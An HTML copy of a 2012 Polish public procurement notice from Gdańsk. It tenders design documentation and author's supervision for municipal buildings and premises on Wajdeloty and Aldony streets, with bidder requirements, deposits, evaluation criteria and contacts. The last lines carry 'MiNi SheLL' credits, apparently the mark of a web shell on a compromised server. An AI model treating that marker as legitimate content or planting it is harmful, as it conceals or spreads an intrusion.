d. Miejskim Konserwatorem Zabytków w zakresie uzyskania pozytywnej opinii zastosowanych rozwiązań.<br>
Dane wyjściowe do projektowania stanowią:<br>
 - Wytyczne do projektowania (lokal Gdańsk - Wrzeszcz ul. Wajdeloty 14/2) UM WUAiOZ - Referat Rewitalizacji dla lokali użytkowych w Dolnym Wrzeszczu - załącznik nr 1C do siwz,<br>
 - szkic sytuacyjny - załącznik nr 1/3 do siwz,<br>
 - szkic lokalu - załącznik nr 2/3 do siwz,<br> 
 - protokół nr 1486/2011 z okresowej kontroli przewodów kominowych z dnia 28.06.2011r. - załącznik nr 3/3 do siwz,<br>
 - pismo UM WUAiOZ z dnia 04.01.2012r. o zgodności zmiany sposobu użytkowania lokalu z planem miejscowym - załącznik nr 4/3 do siwz,<br>
 - kopia mapy zasadniczej do celów informacyjnych - załącznik nr 5/3 do siwz,<br>
 - warunki przyłączenia do sieci elektroenergetycznej Energi - Operator SA z dnia 17.02.2012 r. nr 12/R1/01742- załącznik nr 6/3 do siwz.<br>.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.32.00.00-7, 71.32.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium: 1 800,00 zł, w tym:<br>
zadanie 1 - 1 000,00 zł ,<br>
zadanie 2 -    400,00 zł ,<br>
zadanie 3 -    400,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia  Wykonawca musiał wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert minimum:<br>
W przypadku składania oferty na zadanie 1<br>
- 2 usługi polegające na opracowaniu dokumentacji projektowej remontu budynków zabytkowych wpisanych do rejestru zabytków podlegających nadzorowi Wojewódzkiego Konserwatora Zabytków.<br>
 W przypadku składania oferty na zadanie 2 i/lub 3<br>
- 2 usługi polegające na opracowaniu dokumentacji projektowej remontu (przebudowy) budynków, lokali lub dokumentacji projektowej nowych budynków.<br>
W przypadku składania oferty na zadanie 1 oraz zadanie 2 i/lub 3<br>
- 2 usługi polegające na opracowaniu dokumentacji projektowej remontu budynków zabytkowych wpisanych do rejestru zabytków podlegających nadzorowi Wojewódzkiego Konserwatora Zabytków,<br>
- 2 usługi polegające na opracowaniu dokumentacji projektowej remontu (przebudowy) budynków, lokali lub dokumentacji projektowej nowych budynków.<br>
 Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunki mogą spełniać łącznie.<br>
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.<br>
Wyżej wymienione zobowiązanie musi być złożone w formie oryginału.<br></p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia  Wykonawca musi wykazać dysponowanie:<br> 
W przypadku składania oferty na zadanie 1<br>
- 1 osobą, posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności architektonicznej bez ograniczeń i przynależącej do Izby Architektów,<br>
- 1 osobą, posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń i przynależącej do Izby Inżynierów Budownictwa,<br>
 - 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności instalacyjnej w zakresie sieci sanitarnych oraz instalacji i urządzeń wodociągowych i kanalizacyjnych oraz przynależącej do Izby Inżynierów Budownictwa,<br>
 - 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych oraz przynależącej do Izby Inżynierów Budownictwa,<br> 
W przypadku składania oferty na zadanie 2 i/lub 3 oraz na zadanie 1  oraz na zadanie 2 i/lub 3<br>
- 1 osobą, posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności architektonicznej bez ograniczeń i przynależącej do Izby Architektów,<br>
- 1 osobą, posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń i przynależącej do Izby Inżynierów Budownictwa,<br>
- 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności instalacyjnej w zakresie sieci sanitarnych oraz instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz przynależącej do Izby Inżynierów Budownictwa,<br>
- 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych oraz przynależącej do Izby Inżynierów Budownictwa,<br> 
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował osobami zdolnymi do wykonania zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych osób na okres korzystania z nich przy wykonaniu zamówienia.<br>
Wyżej wymienione zobowiązanie musi być złożone w formie oryginału.<br>
Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać  łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku zamawiającego.<br>
2. Wskazać w złożonej ofercie części zamówienia, których wykonanie powierzy podwykonawcom. W przypadku nie wskazania części zamówienia, które mają być realizowane przez podwykonawców, zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście.<br>
3. Udzielić rękojmi za dzieło na okres 36 miesięcy.<br>
4. Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium wniesionego w jednej z form określonych w punkcie 13 SIWZ.<br>
5. Wykazać, że oferta została podpisana przez osobę(y) uprawnioną(e) do występowania w imieniu i na rzecz Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.85</li>
<li>2 - Termin wykonania zamówienia - 0.15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Następujące postanowienia umów mogą ulec zmianie:<br>
a) przesunięciu może ulec termin wykonania przedmiotu zamówienia w zakresie realizacji prac projektowych,<br>
b) przesunięciu może ulec termin wykonania przedmiotu zamówienia w zakresie realizacji nadzorów autorskich,<br>
2. Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących okoliczności:<br>
2.1. Zmiany spowodowane nieprzewidzianymi w SIWZ warunkami, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:<br>
a) brak zgody wspólnoty mieszkaniowej na konieczne zmiany w częściach wspólnych, które muszą być odzwierciedlone w projektach.<br>
2.2. Zmiany będące następstwem działania organów administracji i innych podmiotów w szczególności gestorów infrastruktury, które powodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie w szczególności:<br>
a) przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma - typowych w danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji, zezwoleń, uzgodnień itp,<br>
b) odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę,<br>
2.3. Wstrzymania realizacji prac przez Zamawiającego lub przerwy w wykonywaniu tych prac powstałych na skutek okoliczności, za które odpowiedzialność ponosi Zamawiający.<br>
2.4. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 2.1. - 2.3. termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.<br>
2.5. Termin wykonania umowy na nadzory autorskie może ulec przesunięciu w przypadku zmiany terminów realizacji robót budowlanych objętych projektami wykonanymi na podstawie niniejszego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk ul. Cygańska Góra1, pokój nr 11 w godz. 09:00 - 12:00,<br> 
cena brutto 24,60 PLN<br>
Warunki płatności: gotówka, zaliczenie pocztowe, przelew.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2012 godzina 10:30, miejsce: siedzibia zamawiającego, 80-171 Gdańsk ul. Cygańska Góra 1 w pokoju nr 11..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 09.05.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> MIEJSCE ORAZ TERMIN OTWARCIA OFERT.<br>
Otwarcie ofert odbędzie się dnia 10.04.2012 r. o godz. 10:45 w siedzibie zamawiającego, 80-171 Gdańsk ul. Cygańska Góra 1 w pokoju nr 6 - świetlica.<br>
OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI.<br>
Marek Skuhra stanowisko służbowe - starszy referent ds. zamówień publicznych,<br> 
Gdańsk ul. Cygańska Góra 1, nr pok. 11, tel. (58) 302 32 82,<br>
Adres poczty elektronicznej: skuhra@gznk.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na przebudowę elementów 4 budynków gminnych przy ul. Wajdeloty 4, 14, 20 i przy ul. Aldony 7 oraz pełnienie nadzoru autorskiego w czasie realizacji robót stanowiących przedmiot opracowanej dokumentacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokumentacja winna obejmować wykonanie:<br>
- izolacji pionowej i poziomej ścian fundamentowych frontowych (elewacje bezpośrednio przylegające do ulicy Wajdeloty i Aldony),<br>
- ocieplenie ścian fundamentowych (elewacje bezpośrednio przylegające do ulicy Wajdeloty i Aldony)<br>
- remont z przebudową, renowacją elementów wejściowych do budynków: schody, przedproża, portale, drzwi wejściowe do budynku z zapewnieniem dostępu dla osób niepełnosprawnych (elewacje bezpośrednio przylegające do ulicy Wajdeloty i Aldony),<br>
- remont lub likwidację okienek i świetlików piwnicznych wraz z ich studzienkami (elewacje bezpośrednio przylegające do ulicy Wajdeloty i Aldony),<br>
- instalacji odgromowych (z prowadzeniem na elewacji bezpośrednio przylegającej do ulicy Wajdeloty i Aldony)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.32.00.00-7, 71.32.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.85</li>
<li>2. Termin wykonania zamówienia - 0.15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ykonanie dokumentacji projektowej na zmianę sposobu użytkowania gminnego lokalu użytkowego przy  ul. Wajdeloty 21  oraz pełnienie nadzoru autorskiego w czasie realizacji robót stanowiących przedmiot opracowanej dokumentacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokumentacja projektowa musi obejmować wykonanie zmiany sposobu użytkowania gminnego lokalu użytkowego przy ul. Wajdeloty 21 z dostosowaniem do działalności opisanej w Wytycznych UM WUAiOZ Referatu Rewitalizacji dla lokali użytkowych w Dolnym Wrzeszczu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.32.00.00-7, 71.32.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.85</li>
<li>2. Termin wykonania zamówienia - 0.15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na zmianę sposobu użytkowania lokalu gminnego nr 2 przy ul. Wajdeloty 14 oraz pełnienie nadzoru autorskiego w czasie realizacji robót stanowiących przedmiot opracowanej dokumentacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokumentacja projektowa musi obejmować wykonanie zmiany sposobu użytkowania lokalu gminnego nr 2 przy ul. Wajdeloty 14 z dostosowaniem do działalności opisanej w Wytycznych UM WUAiOZ Referatu Rewitalizacji dla lokali użytkowych w Dolnym Wrzeszczu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.32.00.00-7, 71.32.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com